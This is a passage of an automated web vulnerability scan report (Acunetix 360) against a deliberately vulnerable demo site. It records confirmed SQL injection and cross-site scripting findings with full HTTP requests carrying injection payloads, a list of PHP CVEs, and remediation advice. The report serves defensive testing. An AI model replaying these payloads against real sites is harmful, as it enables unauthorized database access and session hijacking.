The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.5. http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	id	-1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 187.5242

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:05 GMT

<div><img src='/Mod_Rewrite_Shop/images/1.jpg'><b>Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br>NET STORAGE ENCLOSURE SATA DNS-313 D-LINK<br><a href='/Mod_Rewrite_Shop/BuyProduct-1/'>Buy</a>&nbsp;<a href='/Mod_Rewrite_Shop/RateProduct-1.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.6. http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	id	-1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 181.1241

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:56 GMT

<div>Thanks for rating <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:46 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.7. http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	pic	1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /product.php?pic=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 193.025

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:20 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>picture details</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<script language="javascript1.2">
<!--
	function popUpWindow(URLStr, left, top, width, height)
	{
	  window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+'');
	}
-->
</script>
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div i
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan.	System	6/9/2021 1:44:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.8. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	-1' OR 1=1 OR 'ns'='ns
POST	upass2	Inv1@cti
POST	uaddress	3

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 173
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 184.1501

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:10 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>Error: the username -1' OR 1=1 OR 'ns'='ns allready exist, please press back and choose another one!</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:46 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:48 AM
The Issue was detected during the Scan.	System	6/9/2021 1:44:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.9. http://testphp.vulnweb.com/userinfo.php

CONFIRMED

Method	Parameter	Value
POST	uname	Smith
POST	pass	-1' OR 1=1 OR 'ns'='ns

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

uname=Smith&pass=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

Response

Response Time (ms) : 181.9297

Total Bytes Received : 259

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:36 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your 
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:46 AM
The Issue was detected during the Scan. The State was set to Present	System	6/9/2021 1:44:14 PM

2.10. http://testphp.vulnweb.com/userinfo.php

CONFIRMED

Method	Parameter	Value
POST	uname	-1' OR 1=1 OR 'ns'='ns
POST	pass	Inv1@cti

Proof of Exploit

Identified Database Name

acuart

Identified Database User

acuart@loca  o

Identified Database Version

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

uname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&pass=Inv1%40cti

Response

Response Time (ms) : 192.192

Total Bytes Received : 259

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:49:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your 
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:46 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:48 AM
The Issue was detected during the Scan.	System	6/9/2021 1:44:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

3. Out-of-date Version (PHP)

CRITICAL

Acunetix 360 identified you are using an out-of-date version of PHP.

Impact

Since this is an old version of the software, it may be vulnerable to attacks.

Show Known Vulnerabilities in this Version Hide Known Vulnerabilities in this Version

PHP Other Vulnerability

Double free vulnerability in the format printer in PHP 7.x before 7.0.1 allows remote attackers to have an unspecified impact by triggering an error.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2015-8880

Exploits

PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability

An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2019-9641

Exploits

PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability

The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-7480

Exploits

PHP Improper Input Validation Vulnerability

The zend_string_extend function in Zend/zend_string.h in PHP through 7.1.5 does not prevent changes to string objects that result in a negative length, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact by leveraging a script's use of .= with a long string.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2017-8923

Exploits

PHP Numeric Errors Vulnerability

Integer overflow in the php_filter_encode_url function in ext/filter/sanitizing_filters.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-4345

Exploits

PHP Numeric Errors Vulnerability

Integer overflow in the str_pad function in ext/standard/string.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-4346

Exploits

PHP Numeric Errors Vulnerability

Integer overflow in the xml_utf8_encode function in ext/xml/xml.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long argument to the utf8_encode function, leading to a heap-based buffer overflow.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-4344

Exploits

PHP Integer Overflow or Wraparound Vulnerability

Multiple integer overflows in php_zip.c in the zip extension in PHP before 7.0.6 allow remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted call to (1) getFromIndex or (2) getFromName in the ZipArchive class.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-3078

Exploits

PHP Permissions, Privileges, and Access Controls Vulnerability

An issue was discovered in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. Due to the way rename() across filesystems is implemented, it is possible that file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2019-9637

Exploits

PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability

An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2019-9638

Exploits

PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2019-9639

Exploits

PHP NULL Pointer Dereference Vulnerability

ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM("WScript.Shell").

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2018-19395

Exploits

PHP Deserialization of Untrusted Data Vulnerability

ext/standard/var_unserializer.c in PHP 5.x through 7.1.24 allows attackers to cause a denial of service (application crash) via an unserialize call for the com, dotnet, or variant class.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2018-19396

Exploits

PHP Server-Side Request Forgery (SSRF) Vulnerability

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2017-7272

Exploits

PHP Allocation of Resources Without Limits or Throttling Vulnerability

** DISPUTED ** The GNU Multiple Precision Arithmetic Library (GMP) interfaces for PHP through 7.1.4 allow attackers to cause a denial of service (memory consumption and application crash) via operations on long strings. NOTE: the vendor disputes this, stating "There is no security issue here, because GMP safely aborts in case of an OOM condition. The only attack vector here is denial of service. However, if you allow attacker-controlled, unbounded allocations you have a DoS vector regardless of GMP's OOM behavior."

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2017-7963

Exploits

PHP Improper Access Control Vulnerability

PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2016-5385

Exploits

PHP Uncontrolled Resource Consumption Vulnerability

An issue was discovered in PHP 7.3.x before 7.3.0alpha3, 7.2.x before 7.2.8, and before 7.1.20. The php-fpm master process restarts a child process in an endless loop when using program execution functions (e.g., passthru, exec, shell_exec, or system) with a non-blocking STDIN stream, causing this master process to consume 100% of the CPU, and consume disk space with a large volume of error logs, as demonstrated by an attack by a customer of a shared-hosting facility.

Affected Versions

5.3.0 to 7.0.0

External References

CVE-2015-9253

Exploits

Vulnerabilities

3.1. http://testphp.vulnweb.com/login.php

Identified Version

5.6.40

Latest Version

5.6.40 (in this branch)

Overall Latest Version

8.0.9

Branch Status

This branch has stopped receiving updates since 12/31/2018.

Vulnerability Database

Result is based on 08/20/2021 15:00:00 vulnerability database content.

Page Type

Certainty

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2060.161

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:48:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>login page</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbo
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:28 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:29 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:39 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:27 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:34 PM
The Issue was detected during the Scan.	System	6/9/2021 1:13:40 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:06 AM

Show Remediation Hide Remediation

Remedy

Please upgrade your installation of PHP to the latest stable version.

Remedy References

Downloading PHP

CLASSIFICATION

OWASP Top Ten 2021

A06

4. Cross-site Scripting

HIGH

CONFIRMED

Acunetix 360 detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

4.1. http://testphp.vulnweb.com/comment.php

CONFIRMED

Method	Parameter	Value
POST	phpaction	echo $_POST[comment];
POST	comment
POST	Submit	Submit
POST	name	</title><scRipt>netsparker(0x01C27B)</scRipt>

Request Response Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/comment.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

phpaction=echo+%24_POST%5bcomment%5d%3b&comment=&Submit=Submit&name=%3c%2ftitle%3e%3cscRipt%3enetsparker(0x01C27B)%3c%2fscRipt%3e

Response

Response Time (ms) : 182.0731

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
</title><scRipt>netsparker(0x01C27B)</scRipt> commented</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<p class='story'></title><scRipt>netsparker(0x01C27B)</scRipt>, thank you for your comment.</p><p class='story'><i></p></i></body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:40:10 AM
The Issue was detected during the Scan.	System	8/29/2021 9:23:17 AM
The Issue was detected during the Scan.	System	8/27/2021 9:00:36 AM
The Issue was detected during the Scan.	System	6/9/2021 1:32:20 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:28:14 AM

4.2. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
